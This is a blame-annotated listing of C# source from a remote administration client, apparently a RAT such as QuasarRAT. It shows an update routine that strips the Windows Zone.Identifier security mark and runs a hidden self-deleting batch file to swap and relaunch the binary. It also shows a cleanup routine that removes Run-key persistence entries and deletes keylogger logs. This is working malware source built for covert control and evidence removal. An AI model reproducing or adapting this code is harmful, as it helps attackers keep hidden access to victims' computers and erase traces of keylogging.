2015-03-12 02:44:53 -07:00
|
|
|
|
var startInfo = new ProcessStartInfo
|
|
|
|
|
|
{
|
|
|
|
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
|
|
|
|
CreateNoWindow = true,
|
|
|
|
|
|
UseShellExecute = true,
|
|
|
|
|
|
FileName = InstallPath
|
|
|
|
|
|
};
|
2014-07-08 05:58:53 -07:00
|
|
|
|
Process.Start(startInfo);
|
|
|
|
|
|
|
2015-03-12 02:44:53 -07:00
|
|
|
|
Disconnect = true;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
2015-05-26 06:55:52 -07:00
|
|
|
|
|
2015-05-26 09:14:24 -07:00
|
|
|
|
public static void UpdateClient(Client c, string newFile)
|
2015-05-26 06:55:52 -07:00
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
DeleteFile(newFile + ":Zone.Identifier");
|
|
|
|
|
|
|
|
|
|
|
|
var bytes = File.ReadAllBytes(newFile);
|
|
|
|
|
|
if (bytes[0] != 'M' && bytes[1] != 'Z')
|
|
|
|
|
|
throw new Exception("no pe file");
|
|
|
|
|
|
|
|
|
|
|
|
string filename = Path.Combine(
|
|
|
|
|
|
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
|
2015-07-25 15:10:59 -07:00
|
|
|
|
FileHelper.GetRandomFilename(12, ".bat"));
|
2015-05-26 06:55:52 -07:00
|
|
|
|
|
|
|
|
|
|
string uninstallBatch = (Settings.INSTALL && Settings.HIDEFILE)
|
|
|
|
|
|
? "@echo off" + "\n" +
|
|
|
|
|
|
"echo DONT CLOSE THIS WINDOW!" + "\n" +
|
|
|
|
|
|
"ping -n 20 localhost > nul" + "\n" +
|
|
|
|
|
|
"del /A:H " + "\"" + MyPath + "\"" + "\n" +
|
|
|
|
|
|
"move " + "\"" + newFile + "\"" + " " + "\"" + MyPath + "\"" + "\n" +
|
|
|
|
|
|
"start \"\" " + "\"" + MyPath + "\"" + "\n" +
|
|
|
|
|
|
"del " + "\"" + filename + "\""
|
|
|
|
|
|
: "@echo off" + "\n" +
|
|
|
|
|
|
"echo DONT CLOSE THIS WINDOW!" + "\n" +
|
|
|
|
|
|
"ping -n 20 localhost > nul" + "\n" +
|
|
|
|
|
|
"del " + "\"" + MyPath + "\"" + "\n" +
|
|
|
|
|
|
"move " + "\"" + newFile + "\"" + " " + "\"" + MyPath + "\"" + "\n" +
|
|
|
|
|
|
"start \"\" " + "\"" + MyPath + "\"" + "\n" +
|
|
|
|
|
|
"del " + "\"" + filename + "\""
|
|
|
|
|
|
;
|
|
|
|
|
|
|
|
|
|
|
|
File.WriteAllText(filename, uninstallBatch);
|
|
|
|
|
|
ProcessStartInfo startInfo = new ProcessStartInfo
|
|
|
|
|
|
{
|
|
|
|
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
|
|
|
|
CreateNoWindow = true,
|
|
|
|
|
|
UseShellExecute = true,
|
|
|
|
|
|
FileName = filename
|
|
|
|
|
|
};
|
|
|
|
|
|
Process.Start(startInfo);
|
|
|
|
|
|
|
|
|
|
|
|
Disconnect = true;
|
|
|
|
|
|
c.Disconnect();
|
2015-05-26 09:14:24 -07:00
|
|
|
|
RemoveTraces();
|
2015-05-26 06:55:52 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch (Exception ex)
|
|
|
|
|
|
{
|
|
|
|
|
|
DeleteFile(newFile);
|
2015-07-14 10:00:31 -07:00
|
|
|
|
new Packets.ClientPackets.SetStatus(string.Format("Update failed: {0}", ex.Message)).Execute(c);
|
2015-05-26 06:55:52 -07:00
|
|
|
|
}
|
|
|
|
|
|
}
|
2015-05-26 09:14:24 -07:00
|
|
|
|
|
|
|
|
|
|
public static void RemoveTraces()
|
|
|
|
|
|
{
|
|
|
|
|
|
if (Settings.STARTUP)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (AccountType == "Admin")
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
using (
|
|
|
|
|
|
RegistryKey key =
|
2015-06-02 11:38:44 -07:00
|
|
|
|
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
2015-05-26 09:14:24 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (key != null)
|
|
|
|
|
|
{
|
|
|
|
|
|
key.DeleteValue(Settings.STARTUPKEY, true);
|
|
|
|
|
|
key.Close();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
// try deleting from Registry.CurrentUser
|
|
|
|
|
|
using (
|
|
|
|
|
|
RegistryKey key =
|
2015-06-02 11:38:44 -07:00
|
|
|
|
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
2015-05-26 09:14:24 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (key != null)
|
|
|
|
|
|
{
|
|
|
|
|
|
key.DeleteValue(Settings.STARTUPKEY, true);
|
|
|
|
|
|
key.Close();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
else
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
using (
|
|
|
|
|
|
RegistryKey key =
|
2015-06-02 11:38:44 -07:00
|
|
|
|
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
2015-05-26 09:14:24 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (key != null)
|
|
|
|
|
|
{
|
|
|
|
|
|
key.DeleteValue(Settings.STARTUPKEY, true);
|
|
|
|
|
|
key.Close();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
string logsDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\";
|
|
|
|
|
|
if (Directory.Exists(logsDirectory)) // try to delete Logs from Keylogger
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
Directory.Delete(logsDirectory, true);
|
|
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
2015-04-21 11:27:52 -07:00
|
|
|
|
}
|
